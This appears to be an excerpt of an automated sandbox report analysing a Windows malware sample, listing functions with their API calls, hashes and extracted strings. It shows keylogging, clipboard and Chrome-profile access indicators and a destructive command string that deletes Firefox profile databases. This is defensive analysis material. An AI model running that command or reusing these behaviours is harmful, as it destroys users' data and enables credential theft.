                                            • Snapshot File: hcaresult_2_2_24b626a0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 710fda0f1d38325bf3d824d45633713b5dbd693df1a717c25d9454e584784294
                                            • Instruction ID: 668958b057cbe2cb04f7100f8c1ecc81bc107a03ce7e17ae83f79b4412743f27
                                            • Opcode Fuzzy Hash: 710fda0f1d38325bf3d824d45633713b5dbd693df1a717c25d9454e584784294
                                            • Instruction Fuzzy Hash: D721E72091EA881FF786F778844E79EBBD6EF98210F15849E9447DB267E924C806C741
                                            Function 0000024B626A0BED Relevance: 1.6, APIs: 1, Instructions: 53libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2903813553.0000024B626A0000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000024B626A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b626a0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: cb941176d314d50994f12e4c04a9abb31b0d2322f26f6db4555a5237af00888c
                                            • Instruction ID: 1bca7e8b7a8f4c37df19f54c1ca5b35d0b601d5d0013c48a61952f25bb7c1b85
                                            • Opcode Fuzzy Hash: cb941176d314d50994f12e4c04a9abb31b0d2322f26f6db4555a5237af00888c
                                            • Instruction Fuzzy Hash: 41018431A18A084FFB95FB79844979EB2D6FFEC201F51946A540AD725AED34C901C741
                                            Function 00007FF6E2D6ADE4 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904633402.00007FF6E2D51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6E2D50000, based on PE: true
                                            • Associated: 00000002.00000002.2904616051.00007FF6E2D50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904656659.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904680982.00007FF6E2D82000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904701121.00007FF6E2D85000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ff6e2d50000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3215553584-0
                                            • Opcode ID: daeb9473d2b32cf83c9461a5b039516655241b847a81d08c9e22b3451582354c
                                            • Instruction ID: 3eaa5eec94d0a01d6b6cada05a8307c7e4bbab839f4d431add4887bd70737588
                                            • Opcode Fuzzy Hash: daeb9473d2b32cf83c9461a5b039516655241b847a81d08c9e22b3451582354c
                                            • Instruction Fuzzy Hash: 81119A33E2864286F2109B54A4802B977A6FB40748F450635E7DDC7692EFBEF810C72A
                                            Function 00007FF6E2D68EEC Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6E2D675C1,?,?,00005D93C47BC81C,00007FF6E2D62559,?,?,?,?,00007FF6E2D677A2,?,?,00000000), ref: 00007FF6E2D68F41
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904633402.00007FF6E2D51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6E2D50000, based on PE: true
                                            • Associated: 00000002.00000002.2904616051.00007FF6E2D50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904656659.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904680982.00007FF6E2D82000.00000004.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000002.00000002.2904701121.00007FF6E2D85000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ff6e2d50000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: 075ea7e4c2bf351c61879a8d56ac98c767fd99fc79aa1e4fcee4003ad8d91f2d
                                            • Instruction ID: 82ffa020f89dbe888faa8b61a2ce4e5c48847c618c3bfb15f9656a2292fe174e
                                            • Opcode Fuzzy Hash: 075ea7e4c2bf351c61879a8d56ac98c767fd99fc79aa1e4fcee4003ad8d91f2d
                                            • Instruction Fuzzy Hash: 44F09652F2920B45FE64576158943B522935F88B48F0C0671CF0DC67C2EEAEE499427B
                                            Function 00007FFDFB8B2CD0 Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNEL32(?,?,?,00007FFDFB8B29F3,?,?,?,00007FFDFB8B253D,?,?,?,?,00007FFDFB8B1ECD), ref: 00007FFDFB8B2D15
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Sleep_errno
                                            • String ID:
                                            • API String ID: 1068366078-0
                                            • Opcode ID: dfe64978b2f56b0793aca80552e9b258e9d4d57e910bdb29ae3b2a8446373223
                                            • Instruction ID: f2582de6d0f9d1eaf1cf161c6a13a41e90762b5931f7c54491b457f4a89a3e07
                                            • Opcode Fuzzy Hash: dfe64978b2f56b0793aca80552e9b258e9d4d57e910bdb29ae3b2a8446373223
                                            • Instruction Fuzzy Hash: 8901A722B35B8685EB449F26D820469B761F7C8FD0B584135DE6D037A8CF38E851CB44

                                            Non-executed Functions

                                            Function 0000024B6458F8D0 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 132servicefilesleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Service$CloseHandle$File$Delete$CreateTime_getptd$ComputerManagerNameOpenSleepStartSystemWritelstrcpyrandwsprintf
                                            • String ID: C:\ProgramData\girl.jpg$driver
                                            • API String ID: 2345241111-1437884672
                                            • Opcode ID: 9d3927efc2e86f327e81318a06defe3ff0f5a5e80a7fa5aa5fc8fe9fe512994d
                                            • Instruction ID: 85e1a4117524ef4d4326964af1264f19285a13eef8009e00c259d563d3bd6fb4
                                            • Opcode Fuzzy Hash: 9d3927efc2e86f327e81318a06defe3ff0f5a5e80a7fa5aa5fc8fe9fe512994d
                                            • Instruction Fuzzy Hash: 1A517332614F8086EB259F21F81835E73AAF789B94F464116DA8A47BA9DF3CC449C709
                                            Function 0000024B645984A8 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 200COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID: PATH$del /s /f %appdata%\Mozilla\Firefox\Profiles\*.db
                                            • API String ID: 2819658684-2861927837
                                            • Opcode ID: 5d7ebd22daaf74afd74c40796b9d976dd27c09a5fda1db1556a481787db0bd0b
                                            • Instruction ID: 6e0a1f989aadae5643e881903e1b9df1845f1317ee69b6520085e758d9bde4cd
                                            • Opcode Fuzzy Hash: 5d7ebd22daaf74afd74c40796b9d976dd27c09a5fda1db1556a481787db0bd0b
                                            • Instruction Fuzzy Hash: 6971E462211AC442FF27AB22954D3BE268B9B857D4F068521DF1907BCEDF3CC445860A
                                            Function 0000024B6458DA90 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 125synchronizationfilekeyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: File$CreateMutex$CloseCountDeleteFolderHandleObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                            • String ID: <$\paEqfEiINh.jre$paEqfEiINh.jre
                                            • API String ID: 2154846255-3527366935
                                            • Opcode ID: c90ec30e0ae730cd492638757934f02a9159206527e090b7be205eb521341652
                                            • Instruction ID: f5223ae8872554ad1d84ef67ca2bdc810c42b92c97b90bcfa4622d0d24231c4d
                                            • Opcode Fuzzy Hash: c90ec30e0ae730cd492638757934f02a9159206527e090b7be205eb521341652
                                            • Instruction Fuzzy Hash: 88518931300E8586FB56DF26E85C75A37AAF798B88F024016DA4E47768DF39C48DC708
                                            Function 0000024B642A7E60 Relevance: 18.3, APIs: 12, Instructions: 290COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2819658684-0
                                            • Opcode ID: 64c961bb79e97a4b0cce1bc1c3f25c2806c8cd024d514268ab867f6b142047a0
                                            • Instruction ID: ad7b1020b457ead6124a980dce62595b5363314cf6e9826015b72c213dce6abb
                                            • Opcode Fuzzy Hash: 64c961bb79e97a4b0cce1bc1c3f25c2806c8cd024d514268ab867f6b142047a0
                                            • Instruction Fuzzy Hash: 1B81A131234E494AFF5AB738444E7BA72CAEB84300F764569D846C32DEDF64C8C9865A
                                            Function 0000024B6458DEB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 168stringkeyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: lstrlen$wsprintf$File$Window$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleStateTextTimeWaitWrite
                                            • String ID: %s%s$[esc]
                                            • API String ID: 3231454590-1031636121
                                            • Opcode ID: 95ddf89135496d77df8a34d36fa581a21a90052be2d4c245a83ececa253a15e1
                                            • Instruction ID: c8e77734f5002cd07ef1b375a0985ca6fd9fbdaec68c203aea6a1cbc916a7e46
                                            • Opcode Fuzzy Hash: 95ddf89135496d77df8a34d36fa581a21a90052be2d4c245a83ececa253a15e1
                                            • Instruction Fuzzy Hash: DD71BE31214E54CAEBA7DF25A84C7A933BFF704784F460416EA49976ADEF38C589C708
                                            Function 0000024B6459A244 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 159fileCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $ceil
                                            • API String ID: 2183313154-2708072404
                                            • Opcode ID: e100cb5623a7cfc0df8941c6d10efe82813637f29d3b5093f7d715a41daa83ae
                                            • Instruction ID: 6e900f630544021f44e366ef75b563064bfab645fa2c6d3cf38f3cf74c4902e7
                                            • Opcode Fuzzy Hash: e100cb5623a7cfc0df8941c6d10efe82813637f29d3b5093f7d715a41daa83ae
                                            • Instruction Fuzzy Hash: 4251D122700EC042FB66DB25A85D7AE639BFB85784F464116AF5943BCEDF3CC906C608
                                            Function 0000024B64584210 Relevance: 16.6, APIs: 11, Instructions: 84clipboardmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Clipboard$Global$DataLockWire$AllocAvailableCloseEmptyFormatOpen
                                            • String ID:
                                            • API String ID: 343666531-0
                                            • Opcode ID: 032f6467b590239ace3f774c0966278b6b0e2304ab3d8f33c428c8e3e218ee37
                                            • Instruction ID: b322f85e8c0bb8003f919a1a04d8f77cd0f70f97c8a18da467f699f52d799b7f
                                            • Opcode Fuzzy Hash: 032f6467b590239ace3f774c0966278b6b0e2304ab3d8f33c428c8e3e218ee37
                                            • Instruction Fuzzy Hash: 90318431204F8081FB269B24F41C35A676AFB85BA4F4A0216DA6E077EDDF3CC4888714
                                            Function 0000024B64598808 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 192COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$freewcomexecmd$CurrentProcess_invalid_parameter_noinfo
                                            • String ID: cmd.exe
                                            • API String ID: 1058736139-723907552
                                            • Opcode ID: 0cdefe5e1fc84725cae98ed6f6235c9afdb13a2999a14a73fd17fef3e619f0f1
                                            • Instruction ID: 95851dfb2c3e48f5d4c3fe779ee777a7f0fea1703b992dc8465b487cbe0333d8
                                            • Opcode Fuzzy Hash: 0cdefe5e1fc84725cae98ed6f6235c9afdb13a2999a14a73fd17fef3e619f0f1
                                            • Instruction Fuzzy Hash: 60612E22310EC486FE27EB32551D76E228F9B85BD4F4A4529AF5947BCEDF38C401820E
                                            Function 0000024B64593FA4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$CurrentProcess_invalid_parameter_noinfo_lockfree
                                            • String ID: COMSPEC$cmd.exe
                                            • API String ID: 3119157571-2256226045
                                            • Opcode ID: f09715194f689949f1efb6568b2bcf0a67113f9d87ab5ee388a1aab6d97633db
                                            • Instruction ID: 9566e6b698d3150e8cef64962f416d786c4294ba1ef274bf56a8a61ee6da8323
                                            • Opcode Fuzzy Hash: f09715194f689949f1efb6568b2bcf0a67113f9d87ab5ee388a1aab6d97633db
                                            • Instruction Fuzzy Hash: 5B31B132704F8099FB169FB5A44A29D37AFFB89384F864121EB5987E8ECF34C4548359
                                            Function 0000024B642A32BC Relevance: 15.4, APIs: 10, Instructions: 379COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1457502553-0
                                            • Opcode ID: 80b182fec399e25035d94539b3a052fa9ca79bb0d7bb025d9f5049a9a06a933b
                                            • Instruction ID: 1026b5a58a45f85cb8b3421f152d642b3f2b9f24acfaecf6ccf8aaf90ecaef5f
                                            • Opcode Fuzzy Hash: 80b182fec399e25035d94539b3a052fa9ca79bb0d7bb025d9f5049a9a06a933b
                                            • Instruction Fuzzy Hash: ABB1E331620E094BEF5DAF28885D3A536D9FB58305F55817EEC06CA69EEF34C8898744
                                            Function 0000024B645974B8 Relevance: 15.3, APIs: 10, Instructions: 292timeCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _lock.LIBCMT ref: 0000024B645974E3
                                              • Part of subcall function 0000024B64599B98: _amsg_exit.LIBCMT ref: 0000024B64599BC2
                                            • _get_daylight.LIBCMT ref: 0000024B645974F9
                                              • Part of subcall function 0000024B64598254: _errno.LIBCMT ref: 0000024B6459825D
                                              • Part of subcall function 0000024B64598254: _invalid_parameter_noinfo.LIBCMT ref: 0000024B64598268
                                            • _get_daylight.LIBCMT ref: 0000024B6459750E
                                              • Part of subcall function 0000024B645981F4: _errno.LIBCMT ref: 0000024B645981FD
                                              • Part of subcall function 0000024B645981F4: _invalid_parameter_noinfo.LIBCMT ref: 0000024B64598208
                                            • _get_daylight.LIBCMT ref: 0000024B64597523
                                              • Part of subcall function 0000024B64598224: _errno.LIBCMT ref: 0000024B6459822D
                                              • Part of subcall function 0000024B64598224: _invalid_parameter_noinfo.LIBCMT ref: 0000024B64598238
                                            • ___lc_codepage_func.LIBCMT ref: 0000024B64597530
                                              • Part of subcall function 0000024B64598B10: __wtomb_environ.LIBCMT ref: 0000024B64598B40
                                            • free.LIBCMT ref: 0000024B645975A1
                                              • Part of subcall function 0000024B64593D28: HeapFree.KERNEL32(?,?,00000000,0000024B64594940,?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA), ref: 0000024B64593D3E
                                              • Part of subcall function 0000024B64593D28: _errno.LIBCMT ref: 0000024B64593D48
                                              • Part of subcall function 0000024B64593D28: GetLastError.KERNEL32(?,?,00000000,0000024B64594940,?,?,?,0000024B64593209,?,?,?,?,0000024B645A3CCA), ref: 0000024B64593D50
                                            • free.LIBCMT ref: 0000024B6459760A
                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,00000032,00000000,00000000,0000024B64597EDE,?,?,?,?,0000024B6459397E), ref: 0000024B6459761D
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000032,00000000,00000000,0000024B64597EDE,?,?,?,?,0000024B6459397E), ref: 0000024B645976D3
                                            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000032,00000000,00000000,0000024B64597EDE,?,?,?,?,0000024B6459397E), ref: 0000024B64597726
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$_get_daylight_invalid_parameter_noinfo$ByteCharMultiWidefree$ErrorFreeHeapInformationLastTimeZone___lc_codepage_func__wtomb_environ_amsg_exit_getptd_lock
                                            • String ID:
                                            • API String ID: 2532449802-0
                                            • Opcode ID: c1fa7f40eb7c03d34230419b027a93e70f574f0f58e1d6dfd72d0dfeb88afd4a
                                            • Instruction ID: d60db0492c495f1d16446374b336588e851bdd2d46f4b1161547561a14fdc3eb
                                            • Opcode Fuzzy Hash: c1fa7f40eb7c03d34230419b027a93e70f574f0f58e1d6dfd72d0dfeb88afd4a
                                            • Instruction Fuzzy Hash: F8C1E332204EC0C6FB66AF25E95976E7B9FF785780F4641269B894379EDB38C811C708
                                            Function 0000024B64593904 Relevance: 15.3, APIs: 10, Instructions: 255COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1457502553-0
                                            • Opcode ID: be87a26379802a4a52173af5778f242a0df836d1e75f94d751b5ea2289455124
                                            • Instruction ID: e3b2769cd9a8bb19fb384690ca79a927f7f6b0fb73ad0a9883dd0e0e798ecd30
                                            • Opcode Fuzzy Hash: be87a26379802a4a52173af5778f242a0df836d1e75f94d751b5ea2289455124
                                            • Instruction Fuzzy Hash: F191E9B3710B85C7EF599F75C8597A9639BE758788F05902ADB0D8AF8EEB38C4018704
                                            Function 0000024B6458EF20 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 127fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$FileFindFirst
                                            • String ID: *.*$\AppData\Local\Google\Chrome\User Data\Default$invalid string position
                                            • API String ID: 3164152327-3505193513
                                            • Opcode ID: be75264c58c03208dd292bdc0067c706cde63964e549d0ae91b4dabfac3ba795
                                            • Instruction ID: d98cc891f8ffd99b55d924e50b37cd4e01cae4db5ed922d865b3bbd51a28141e
                                            • Opcode Fuzzy Hash: be75264c58c03208dd292bdc0067c706cde63964e549d0ae91b4dabfac3ba795
                                            • Instruction Fuzzy Hash: 0551A522204E9198FB22DB24E85C39D67BBF785798F510216EB5E43AEDDF38C549C704
                                            Function 0000024B645A2ADC Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo$_cftoe_l_getptd
                                            • String ID: gfffffff
                                            • API String ID: 1282097019-1523873471
                                            • Opcode ID: 5ae6ad1b3ce903b755c2ece2f71ad84805c3b8c7d7631cbc5e7561ea6abc8e18
                                            • Instruction ID: 47be8cccf1454ac9a4bfbf3bf1c9971a2b145686f69489f100bef834f235cd37
                                            • Opcode Fuzzy Hash: 5ae6ad1b3ce903b755c2ece2f71ad84805c3b8c7d7631cbc5e7561ea6abc8e18
                                            • Instruction Fuzzy Hash: 33B17863704BC89BFB128B26854A3ED7BAAE711794F058622EF59077DAD738C499C304
                                            Function 00007FFDFB8B3FE0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 137fileCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFDFB8B423C,?,?,?,?,00007FFDFB8B1D69,?,?,00000000,00007FFDFB8B2C88), ref: 00007FFDFB8B40A3
                                            • GetStdHandle.KERNEL32(?,?,?,?,?,00007FFDFB8B423C,?,?,?,?,00007FFDFB8B1D69,?,?,00000000,00007FFDFB8B2C88), ref: 00007FFDFB8B41AF
                                            • WriteFile.KERNEL32 ref: 00007FFDFB8B41E9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: File$HandleModuleNameWrite
                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                            • API String ID: 3784150691-4022980321
                                            • Opcode ID: 62d5305022c4c614f020b1db7767cc2069569f00a6ab7fade778088532e575bc
                                            • Instruction ID: 8e9a6d5feb026ca6cee3155509245142e8487c40d471e5891fde017ae9625398
                                            • Opcode Fuzzy Hash: 62d5305022c4c614f020b1db7767cc2069569f00a6ab7fade778088532e575bc
                                            • Instruction Fuzzy Hash: 9451AD25F3A64341FB249B31A976FBA2251AFD4784F44C636D92D466FECF3CE1058A80
                                            Function 0000024B64595518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID: ceil
                                            • API String ID: 1239891234-3069211559
